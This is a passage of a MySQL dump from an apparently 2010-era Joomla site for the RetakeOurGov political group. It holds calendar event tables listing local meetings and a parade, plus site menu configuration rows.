  `autorefresh` tinyint(3) NOT NULL DEFAULT '0',
  PRIMARY KEY (`ics_id`),
  UNIQUE KEY `label` (`label`),
  KEY `stateidx` (`state`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_jevents_icsfile`
--

LOCK TABLES `jos_jevents_icsfile` WRITE;
/*!40000 ALTER TABLE `jos_jevents_icsfile` DISABLE KEYS */;
INSERT INTO `jos_jevents_icsfile` VALUES (1,'','Default','Initial ICS File',2,1,0,1,0,20,'0000-00-00 00:00:00',0,'',0,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `jos_jevents_icsfile` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_jevents_repbyday`
--

DROP TABLE IF EXISTS `jos_jevents_repbyday`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_jevents_repbyday` (
  `rptday` date NOT NULL DEFAULT '0000-00-00',
  `rp_id` int(12) NOT NULL DEFAULT '0',
  `catid` int(11) NOT NULL DEFAULT '1',
  KEY `rptday` (`rptday`),
  KEY `daycat` (`rptday`,`catid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_jevents_repbyday`
--

LOCK TABLES `jos_jevents_repbyday` WRITE;
/*!40000 ALTER TABLE `jos_jevents_repbyday` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_jevents_repbyday` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_jevents_repetition`
--

DROP TABLE IF EXISTS `jos_jevents_repetition`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_jevents_repetition` (
  `rp_id` int(12) NOT NULL AUTO_INCREMENT,
  `eventid` int(12) NOT NULL DEFAULT '1',
  `eventdetail_id` int(12) NOT NULL DEFAULT '0',
  `duplicatecheck` varchar(32) NOT NULL DEFAULT '',
  `startrepeat` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `endrepeat` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`rp_id`),
  UNIQUE KEY `duplicatecheck` (`duplicatecheck`),
  KEY `eventid` (`eventid`),
  KEY `eventstart` (`eventid`,`startrepeat`),
  KEY `eventend` (`eventid`,`endrepeat`),
  KEY `eventdetail` (`eventdetail_id`),
  KEY `startrepeat` (`startrepeat`),
  KEY `startend` (`startrepeat`,`endrepeat`),
  KEY `endrepeat` (`endrepeat`)
) ENGINE=MyISAM AUTO_INCREMENT=13 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_jevents_repetition`
--

LOCK TABLES `jos_jevents_repetition` WRITE;
/*!40000 ALTER TABLE `jos_jevents_repetition` DISABLE KEYS */;
INSERT INTO `jos_jevents_repetition` VALUES (1,1,1,'4db5e37ea38c6ed624439c8114501dd4','2010-06-14 08:00:00','2010-06-14 17:00:00'),(2,1,1,'50e7f69c5ac5d63040c6a46289abcf91','2010-06-15 08:00:00','2010-06-15 17:00:00'),(3,1,1,'bca6ac63d2e5bec6d04957d5acc0708b','2010-06-16 08:00:00','2010-06-16 17:00:00'),(4,1,1,'e5de85a42aca2c7cd2f42d71543b09a6','2010-06-17 08:00:00','2010-06-17 17:00:00'),(5,1,1,'9b87d422760358adbaf5f0de31c985ea','2010-06-18 08:00:00','2010-06-18 17:00:00'),(6,1,1,'76c6fe0df762dda2b80b5b43818425ee','2010-06-19 08:00:00','2010-06-19 17:00:00'),(7,1,1,'da21fd80b23ef0659118d4aafcac32e0','2010-06-20 08:00:00','2010-06-20 17:00:00'),(8,1,1,'66b37ae50a3ae1cd5970ac10984f710b','2010-06-21 08:00:00','2010-06-21 17:00:00'),(9,1,1,'810ac7621d48fea0a323a8b1c7e161e3','2010-06-22 08:00:00','2010-06-22 17:00:00'),(10,1,1,'89fe33a00dffa6608f333b11cf13ef41','2010-06-23 08:00:00','2010-06-23 17:00:00'),(11,2,2,'3dd2df5e40bd40fb21e3f8c0c5efe765','2010-07-07 19:00:00','2010-07-07 20:30:00'),(12,3,3,'cccd42960ea17f107c6c94e4d84099f9','2010-07-03 10:00:00','2010-07-03 15:00:00');
/*!40000 ALTER TABLE `jos_jevents_repetition` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_jevents_rrule`
--

DROP TABLE IF EXISTS `jos_jevents_rrule`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_jevents_rrule` (
  `rr_id` int(12) NOT NULL AUTO_INCREMENT,
  `eventid` int(12) NOT NULL DEFAULT '1',
  `freq` varchar(30) NOT NULL DEFAULT '',
  `until` int(12) NOT NULL DEFAULT '1',
  `untilraw` varchar(30) NOT NULL DEFAULT '',
  `count` int(6) NOT NULL DEFAULT '1',
  `rinterval` int(6) NOT NULL DEFAULT '1',
  `bysecond` varchar(50) NOT NULL DEFAULT '',
  `byminute` varchar(50) NOT NULL DEFAULT '',
  `byhour` varchar(50) NOT NULL DEFAULT '',
  `byday` varchar(50) NOT NULL DEFAULT '',
  `bymonthday` varchar(50) NOT NULL DEFAULT '',
  `byyearday` varchar(50) NOT NULL DEFAULT '',
  `byweekno` varchar(50) NOT NULL DEFAULT '',
  `bymonth` varchar(50) NOT NULL DEFAULT '',
  `bysetpos` varchar(50) NOT NULL DEFAULT '',
  `wkst` varchar(50) NOT NULL DEFAULT '',
  PRIMARY KEY (`rr_id`),
  KEY `eventid` (`eventid`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_jevents_rrule`
--

LOCK TABLES `jos_jevents_rrule` WRITE;
/*!40000 ALTER TABLE `jos_jevents_rrule` DISABLE KEYS */;
INSERT INTO `jos_jevents_rrule` VALUES (1,1,'DAILY',0,'',10,1,'','','','MO','','','','','',''),(2,2,'none',0,'',1,1,'','','','+1WE,+2WE,+3WE,+4WE,+5WE','','','','','',''),(3,3,'none',0,'',1,1,'','','','+1SA,+2SA,+3SA,+4SA,+5SA','','','','','','');
/*!40000 ALTER TABLE `jos_jevents_rrule` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_jevents_vevdetail`
--

DROP TABLE IF EXISTS `jos_jevents_vevdetail`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_jevents_vevdetail` (
  `evdet_id` int(12) NOT NULL AUTO_INCREMENT,
  `rawdata` longtext NOT NULL,
  `dtstart` int(11) NOT NULL DEFAULT '0',
  `dtstartraw` varchar(30) NOT NULL DEFAULT '',
  `duration` int(11) NOT NULL DEFAULT '0',
  `durationraw` varchar(30) NOT NULL DEFAULT '',
  `dtend` int(11) NOT NULL DEFAULT '0',
  `dtendraw` varchar(30) NOT NULL DEFAULT '',
  `dtstamp` varchar(30) NOT NULL DEFAULT '',
  `class` varchar(10) NOT NULL DEFAULT '',
  `categories` varchar(120) NOT NULL DEFAULT '',
  `color` varchar(20) NOT NULL DEFAULT '',
  `description` longtext NOT NULL,
  `geolon` float NOT NULL DEFAULT '0',
  `geolat` float NOT NULL DEFAULT '0',
  `location` varchar(120) NOT NULL DEFAULT '',
  `priority` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `status` varchar(20) NOT NULL DEFAULT '',
  `summary` longtext NOT NULL,
  `contact` varchar(120) NOT NULL DEFAULT '',
  `organizer` varchar(120) NOT NULL DEFAULT '',
  `url` varchar(120) NOT NULL DEFAULT '',
  `extra_info` varchar(240) NOT NULL DEFAULT '',
  `created` varchar(30) NOT NULL DEFAULT '',
  `sequence` int(11) NOT NULL DEFAULT '1',
  `state` tinyint(3) NOT NULL DEFAULT '1',
  `multiday` tinyint(3) NOT NULL DEFAULT '1',
  `hits` int(11) NOT NULL DEFAULT '0',
  `noendtime` tinyint(3) NOT NULL DEFAULT '0',
  PRIMARY KEY (`evdet_id`),
  FULLTEXT KEY `searchIdx` (`summary`,`description`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_jevents_vevdetail`
--

LOCK TABLES `jos_jevents_vevdetail` WRITE;
/*!40000 ALTER TABLE `jos_jevents_vevdetail` DISABLE KEYS */;
INSERT INTO `jos_jevents_vevdetail` VALUES (1,'',1276516800,'',0,'',1276549200,'','','','','','<p>Meet the next president.</p>',0,0,'Lake Wobegone',0,'','Test Event','Larry Longwind','','','','',0,1,1,6,0),(2,'',1278543600,'',0,'',1278549000,'','','','','','<p>Meeting is held in an empty storefront located next to O\'Malley\'s Irish Pub in the Hartland Town Square.  PLEASE BRING YOUR OWN CHAIR TO SIT ON.  First time participants are encouraged to arrive at 6:45 for a brief introduction.</p>\r\n<p>Hartland Town Square on Old 23, South of M59 in Hartland Township</p>',0,0,'Hartland Town Square on Old 23, South of M59 in Hartland Township',0,'','Regular Meeting - (click for more details)','Wes Nakagiri 248.505.8918','','','Meeting is held in an empty storefront located next to O\'Malley\'s Irish Pub in the Hartland Town Square.  PLEASE BRING YOUR OWN CHAIR TO SIT ON.  First time participants are encouraged to arrive at 6:45 for a brief introduction.','',0,1,1,4,0),(3,'',1278165600,'',0,'',1278183600,'','','','','','<p>RetakeOurGov is marching in the Independence Day Parade in Fenton, MI.  The Parade is actually being held on July 3.  Check back later as more details will be posted.</p>',0,0,'Fenton, MI',0,'','Independence Day Parade (click for details)','dowocki@retakeourgov.com','','','','',0,1,1,4,1);
/*!40000 ALTER TABLE `jos_jevents_vevdetail` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_jevents_vevent`
--

DROP TABLE IF EXISTS `jos_jevents_vevent`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_jevents_vevent` (
  `ev_id` int(12) NOT NULL AUTO_INCREMENT,
  `icsid` int(12) NOT NULL DEFAULT '0',
  `catid` int(11) NOT NULL DEFAULT '1',
  `uid` varchar(255) NOT NULL DEFAULT '',
  `refreshed` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(11) unsigned NOT NULL DEFAULT '0',
  `created_by_alias` varchar(100) NOT NULL DEFAULT '',
  `modified_by` int(11) unsigned NOT NULL DEFAULT '0',
  `rawdata` longtext NOT NULL,
  `recurrence_id` varchar(30) NOT NULL DEFAULT '',
  `detail_id` int(12) NOT NULL DEFAULT '0',
  `state` tinyint(3) NOT NULL DEFAULT '1',
  `access` int(11) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`ev_id`),
  UNIQUE KEY `uid` (`uid`),
  KEY `icsid` (`icsid`),
  KEY `stateidx` (`state`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_jevents_vevent`
--

LOCK TABLES `jos_jevents_vevent` WRITE;
/*!40000 ALTER TABLE `jos_jevents_vevent` DISABLE KEYS */;
INSERT INTO `jos_jevents_vevent` VALUES (1,1,20,'7cb8325a71f23d3a0288bacd72362a37','0000-00-00 00:00:00','2010-06-11 02:20:19',63,'',63,'a:16:{s:3:\"UID\";s:32:\"7cb8325a71f23d3a0288bacd72362a37\";s:11:\"X-EXTRAINFO\";s:0:\"\";s:8:\"LOCATION\";s:13:\"Lake Wobegone\";s:11:\"allDayEvent\";s:3:\"off\";s:7:\"CONTACT\";s:14:\"Larry Longwind\";s:11:\"DESCRIPTION\";s:31:\"<p>Meet the next president.</p>\";s:12:\"publish_down\";s:10:\"2010-06-14\";s:10:\"publish_up\";s:10:\"2010-06-14\";s:7:\"SUMMARY\";s:10:\"Test Event\";s:11:\"X-CREATEDBY\";i:63;s:7:\"DTSTART\";i:1276516800;s:5:\"DTEND\";i:1276549200;s:5:\"RRULE\";a:4:{s:4:\"FREQ\";s:5:\"DAILY\";s:5:\"COUNT\";i:10;s:8:\"INTERVAL\";s:1:\"1\";s:5:\"BYDAY\";s:2:\"MO\";}s:8:\"MULTIDAY\";s:1:\"1\";s:9:\"NOENDTIME\";s:1:\"0\";s:7:\"X-COLOR\";s:0:\"\";}','',1,0,0),(2,1,20,'6207e62a27271d269b9c9b59f0d3c235','0000-00-00 00:00:00','2010-06-13 00:26:44',62,'',62,'a:16:{s:3:\"UID\";s:32:\"6207e62a27271d269b9c9b59f0d3c235\";s:11:\"X-EXTRAINFO\";s:228:\"Meeting is held in an empty storefront located next to O\'Malley\'s Irish Pub in the Hartland Town Square.  PLEASE BRING YOUR OWN CHAIR TO SIT ON.  First time participants are encouraged to arrive at 6:45 for a brief introduction.\";s:8:\"LOCATION\";s:65:\"Hartland Town Square on Old 23, South of M59 in Hartland Township\";s:11:\"allDayEvent\";s:3:\"off\";s:7:\"CONTACT\";s:25:\"Wes Nakagiri 248.505.8918\";s:11:\"DESCRIPTION\";s:311:\"<p>Meeting is held in an empty storefront located next to O\'Malley\'s Irish Pub in the Hartland Town Square.  PLEASE BRING YOUR OWN CHAIR TO SIT ON.  First time participants are encouraged to arrive at 6:45 for a brief introduction.</p>\r\n<p>Hartland Town Square on Old 23, South of M59 in Hartland Township</p>\";s:12:\"publish_down\";s:10:\"2010-07-07\";s:10:\"publish_up\";s:10:\"2010-07-07\";s:7:\"SUMMARY\";s:42:\"Regular Meeting - (click for more details)\";s:11:\"X-CREATEDBY\";i:62;s:7:\"DTSTART\";i:1278543600;s:5:\"DTEND\";i:1278549000;s:5:\"RRULE\";a:4:{s:4:\"FREQ\";s:4:\"none\";s:5:\"COUNT\";i:1;s:8:\"INTERVAL\";s:1:\"1\";s:5:\"BYDAY\";s:24:\"+1WE,+2WE,+3WE,+4WE,+5WE\";}s:8:\"MULTIDAY\";s:1:\"1\";s:9:\"NOENDTIME\";s:1:\"0\";s:7:\"X-COLOR\";s:0:\"\";}','',2,1,0),(3,1,20,'beb53222d2a7ed246efe55dac630be69','0000-00-00 00:00:00','2010-06-13 23:14:03',64,'',62,'a:16:{s:3:\"UID\";s:32:\"beb53222d2a7ed246efe55dac630be69\";s:11:\"X-EXTRAINFO\";s:0:\"\";s:8:\"LOCATION\";s:10:\"Fenton, MI\";s:11:\"allDayEvent\";s:3:\"off\";s:7:\"CONTACT\";s:24:\"dowocki@retakeourgov.com\";s:11:\"DESCRIPTION\";s:175:\"<p>RetakeOurGov is marching in the Independence Day Parade in Fenton, MI.  The Parade is actually being held on July 3.  Check back later as more details will be posted.</p>\";s:12:\"publish_down\";s:10:\"2010-07-03\";s:10:\"publish_up\";s:10:\"2010-07-03\";s:7:\"SUMMARY\";s:43:\"Independence Day Parade (click for details)\";s:11:\"X-CREATEDBY\";i:64;s:7:\"DTSTART\";i:1278165600;s:5:\"DTEND\";i:1278183600;s:5:\"RRULE\";a:4:{s:4:\"FREQ\";s:4:\"none\";s:5:\"COUNT\";i:1;s:8:\"INTERVAL\";s:1:\"1\";s:5:\"BYDAY\";s:24:\"+1SA,+2SA,+3SA,+4SA,+5SA\";}s:8:\"MULTIDAY\";s:1:\"1\";s:9:\"NOENDTIME\";s:1:\"1\";s:7:\"X-COLOR\";s:0:\"\";}','',3,1,0);
/*!40000 ALTER TABLE `jos_jevents_vevent` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_menu`
--

DROP TABLE IF EXISTS `jos_menu`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_menu` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `menutype` varchar(75) DEFAULT NULL,
  `name` varchar(255) DEFAULT NULL,
  `alias` varchar(255) NOT NULL DEFAULT '',
  `link` text,
  `type` varchar(50) NOT NULL DEFAULT '',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `parent` int(11) unsigned NOT NULL DEFAULT '0',
  `componentid` int(11) unsigned NOT NULL DEFAULT '0',
  `sublevel` int(11) DEFAULT '0',
  `ordering` int(11) DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `pollid` int(11) NOT NULL DEFAULT '0',
  `browserNav` tinyint(4) DEFAULT '0',
  `access` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `utaccess` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `params` text NOT NULL,
  `lft` int(11) unsigned NOT NULL DEFAULT '0',
  `rgt` int(11) unsigned NOT NULL DEFAULT '0',
  `home` int(1) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `componentid` (`componentid`,`menutype`,`published`,`access`),
  KEY `menutype` (`menutype`)
) ENGINE=MyISAM AUTO_INCREMENT=123 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_menu`
--

LOCK TABLES `jos_menu` WRITE;
/*!40000 ALTER TABLE `jos_menu` DISABLE KEYS */;
INSERT INTO `jos_menu` VALUES (1,'mainmenu','Home','home-mainmenu-1','index.php?option=com_content&view=frontpage','component',1,0,20,0,1,0,'0000-00-00 00:00:00',0,0,0,3,'num_leading_articles=1\nnum_intro_articles=0\nnum_columns=0\nnum_links=0\norderby_pri=\norderby_sec=front\nmulti_column_order=1\nshow_pagination=2\nshow_pagination_results=1\nshow_feed_link=1\nshow_noauth=\nshow_title=1\nlink_titles=\nshow_intro=\nshow_section=0\nlink_section=\nshow_category=0\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=0\nshow_print_icon=0\nshow_email_icon=0\nshow_hits=\nfeed_summary=\npage_title=RetakeOurGov\nshow_page_title=0\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,1),(3,'mainmenu','Contact Us','contact-us-mainmenu-3','index.php?option=com_contact&view=category&catid=12','component',1,61,7,2,2,0,'0000-00-00 00:00:00',0,0,0,3,'display_num=20\nimage=-1\nimage_align=right\nshow_limit=0\nshow_feed_link=1\ncontact_icons=\nicon_address=\nicon_email=\nicon_telephone=\nicon_mobile=\nicon_fax=\nicon_misc=\nshow_headings=\nshow_position=1\nshow_email=\nshow_telephone=\nshow_mobile=\nshow_fax=\nallow_vcard=\nbanned_email=\nbanned_subject=\nbanned_text=\nvalidate_session=\ncustom_reply=\npage_title=Contacts\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(5,'mainmenu','Search','search-mainmenu-5','index.php?option=com_search','component',1,61,15,2,1,0,'0000-00-00 00:00:00',0,0,0,3,'menu_image=\npageclass_sfx=\nback_button=\nshow_page_title=1\npage_title=\nshow_title=1\n',0,0,0),(6,'mainmenu','Joomla! License','joomla-license-mainmenu-6','index.php?option=com_content&view=article&id=5','component',0,26,20,2,4,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(8,'mainmenu','FAQ\'s','faqs','index.php?option=com_content&view=article&id=42','component',1,61,20,2,4,0,'0000-00-00 00:00:00',0,0,0,3,'show_noauth=\nshow_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=0\nshow_create_date=0\nshow_modify_date=0\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(10,'othermenu','Joomla! Home','joomla-home-othermenu-10','http://www.joomla.org','url',1,0,0,0,1,0,'0000-00-00 00:00:00',0,0,0,3,'\nshow_title=1\nshow_page_title=1\n',0,0,0),(11,'othermenu','Joomla! Forums','joomla-forums-othermenu-11','http://forum.joomla.org','url',1,0,0,0,1,0,'0000-00-00 00:00:00',0,0,0,3,'\nshow_title=1\nshow_page_title=1\n',0,0,0),(12,'othermenu','OSM Home','osm-home-othermenu-12','http://www.opensourcematters.org','url',1,0,0,0,1,0,'0000-00-00 00:00:00',0,0,0,3,'\nshow_title=1\nshow_page_title=1\n',0,0,0),(13,'usermenu','Submit News','submit-news-usermenu-13','index.php?option=com_content&task=new&sectionid=1','url',1,0,0,0,2,0,'0000-00-00 00:00:00',0,0,1,2,'\nshow_title=1\nshow_page_title=1\n',0,0,0),(14,'usermenu','Submit WebLink','submit-weblink-usermenu-14','index.php?option=com_weblinks&view=weblink&layout=form','url',1,0,0,0,4,0,'0000-00-00 00:00:00',0,0,1,2,'\nshow_title=1\nshow_page_title=1\n',0,0,0),(15,'usermenu','Check-In My Items','check-in-my-items-usermenu-15','index.php?option=com_user&task=checkin','url',1,0,0,0,5,0,'0000-00-00 00:00:00',0,0,1,2,'\nshow_title=1\nshow_page_title=1\n',0,0,0),(16,'usermenu','Logout','logout-usermenu-16','index.php?option=com_user&view=login','component',1,0,14,0,5,0,'0000-00-00 00:00:00',0,0,1,3,'\nshow_title=1\nshow_page_title=1\n',0,0,0),(17,'topmenu','Make a Contribution','make-a-contribution','https://secure.piryx.com/donate/ZolDqAzM/Stop-Socialism-B4itz2L8/','url',1,0,0,0,2,0,'0000-00-00 00:00:00',0,1,0,3,'menu_image=contribute.png\n\n',0,0,0),(18,'topmenu','Buy JSN Epic PRO','buy-jsn-epic-pro','http://www.joomlashine.com/joomla-templates/buy-jsn-epic.html','url',0,0,0,0,1,0,'0000-00-00 00:00:00',0,0,0,3,'menu_image=-1\n\n',0,0,0),(19,'topmenu','Download Contribution Mail-in Form','download-contrbution-mail-in-form','http://www.retakeourgov.com/contribution_cards_single_for_web.pdf','url',1,0,0,0,3,0,'0000-00-00 00:00:00',0,1,0,3,'menu_image=-1\n\n',0,0,0),(21,'usermenu','Your Details','your-details-usermenu-21','index.php?option=com_user&task=edit','url',1,0,0,0,1,0,'0000-00-00 00:00:00',0,0,1,3,'\nshow_title=1\nshow_page_title=1\n',0,0,0),(23,'mainmenu','Links','links-mainmenu-23','index.php?option=com_weblinks&view=categories','component',1,61,4,2,3,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=web_links.jpg\npageclass_sfx=\nback_button=\nshow_page_title=1\npage_title=\nshow_headings=1\nshow_hits=\nitem_show_description=1\nother_cat_show_section=1\nshow_categories=1\nshow_description=1\ndescription_text=\nimage=-1\nimage_align=right\nweblink_icons=\nshow_title=1\n',0,0,0),(24,'othermenu','Administrator','administrator-othermenu-24','administrator/','url',1,0,0,0,3,0,'0000-00-00 00:00:00',0,0,0,3,'menu_image=-1\nshow_title=1\nshow_page_title=1\n',0,0,0),(25,'mainmenu','FAQs','faqs-mainmenu-25','index.php?option=com_content&view=category&id=7','component',0,26,20,2,5,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nshow_page_title=1\npageclass_sfx=\nback_button=\nshow_category_description=1\ndescription_cat_image=1\norderby=\ndate_format=\nshow_date=\nshow_author=\nshow_hits=\nshow_headings=1\nshow_item_navigation=1\norder_select=1\nshow_pagination_limit=1\ndisplay_num=50\nfilter=1\nfilter_type=title\nshow_categories=1\nshow_empty_categories=0\nshow_cat_num_articles=1\ncat_show_description=1\nunpublished=1\nshow_title=1\n',0,0,0),(26,'mainmenu','Articles','articles-mainmenu-26','index.php?option=com_content&view=section&layout=blog&id=1','component',1,58,20,1,1,0,'0000-00-00 00:00:00',0,0,0,0,'show_description=0\nshow_description_image=0\nnum_leading_articles=1\nnum_intro_articles=4\nnum_columns=2\nnum_links=4\norderby_pri=\norderby_sec=\nmulti_column_order=0\nshow_pagination=2\nshow_pagination_results=1\nshow_feed_link=1\nshow_noauth=\nshow_title=1\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=0\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(27,'mainmenu','Latest News','latest-news-mainmenu-27','index.php?option=com_content&view=category&layout=blog&id=1','component',0,26,20,2,2,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\npageclass_sfx=\nback_button=\npage_title=\nshow_page_title=1\nnum_leading_articles=1\nnum_intro_articles=4\nnum_columns=2\nnum_links=4\norderby_pri=\norderby_sec=\nshow_pagination=2\nshow_pagination_results=1\nimage=1\nshow_description=0\nshow_description_image=0\nshow_category=0\ncategory_num_links=0\nshow_title=1\nlink_titles=\nshow_readmore=\nshow_vote=\nshow_author=\nshow_create_show_date=\nshow_modify_show_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nunpublished=0\ncategoryid=1\nshow_title=1\n',0,0,0),(28,'mainmenu','Newsflash 1','newsflash-1-mainmenu-28','index.php?option=com_content&view=article&id=2','component',1,42,20,3,1,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(29,'mainmenu','Newsflash 2','newsflash-2-mainmenu-29','index.php?option=com_content&view=article&id=3','component',1,42,20,3,2,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(30,'mainmenu','Newsflash 3','newsflash-3-mainmenu-30','index.php?option=com_content&view=article&id=4','component',1,42,20,3,3,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(31,'mainmenu','News Item 1','news-item-1-mainmenu-31','index.php?option=com_content&view=article&id=6','component',1,27,20,3,1,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(32,'mainmenu','News Item 2','news-item-2-mainmenu-32','index.php?option=com_content&view=article&id=7','component',1,27,20,3,2,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(33,'mainmenu','News Item 3','news-item-3-mainmenu-33','index.php?option=com_content&view=article&id=8','component',1,27,20,3,3,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(34,'mainmenu','News Item 4','news-item-4-mainmenu-34','index.php?option=com_content&view=article&id=9','component',1,27,20,3,4,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(35,'mainmenu','FAQ Item 1','faq-item-1-mainmenu-35','index.php?option=com_content&view=article&id=10','component',1,25,20,3,1,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(36,'mainmenu','FAQ Item 2','faq-item-2-mainmenu-36','index.php?option=com_content&view=article&id=11','component',1,25,20,3,2,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(42,'mainmenu','Newsflash','newsflash-mainmenu-42','index.php?option=com_content&view=category&layout=blog&id=3','component',0,26,20,2,3,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\npageclass_sfx=\nback_button=\npage_title=\nshow_page_title=1\nnum_leading_articles=5\nnum_intro_articles=0\nnum_columns=0\nnum_links=5\norderby_pri=\norderby_sec=\nshow_pagination=2\nshow_pagination_results=1\nimage=1\nshow_description=0\nshow_description_image=0\nshow_category=0\ncategory_num_links=0\nshow_title=1\nlink_titles=\nshow_readmore=\nshow_vote=\nshow_author=\nshow_create_show_date=\nshow_modify_show_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nunpublished=0\ncategoryid=3\nshow_title=1\n',0,0,0),(43,'mainmenu','What is a Grassroots Movement?','what-is-a-grassroots-movement','index.php?option=com_content&view=article&id=41','component',1,26,20,2,1,0,'0000-00-00 00:00:00',0,0,0,0,'show_noauth=\nshow_title=1\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_item_navigation=\nshow_readmore=\nshow_vote=\nshow_icons=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nshow_hits=\nfeed_summary=\npage_title=\nshow_page_title=1\npageclass_sfx=\nmenu_image=-1\nsecure=0\n\n',0,0,0),(44,'mainmenu','Typography','typography-mainmenu-44','index.php?option=com_content&view=article&id=12','component',1,48,20,1,7,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(45,'mainmenu','Layout','layout-mainmenu-45','index.php?option=com_content&view=article&id=14','component',1,48,20,1,4,0,'0000-00-00 00:00:00',0,0,0,0,'menu_image=-1\nunique_itemid=0\nshow_title=1\nshow_page_title=1\n',0,0,0),(46,'mainmenu','Module Styles','module-styles-mainmenu-46','index.php?option=com_content&view=article&id=15','component',1,48,20,1,6,0,'0000-00-00 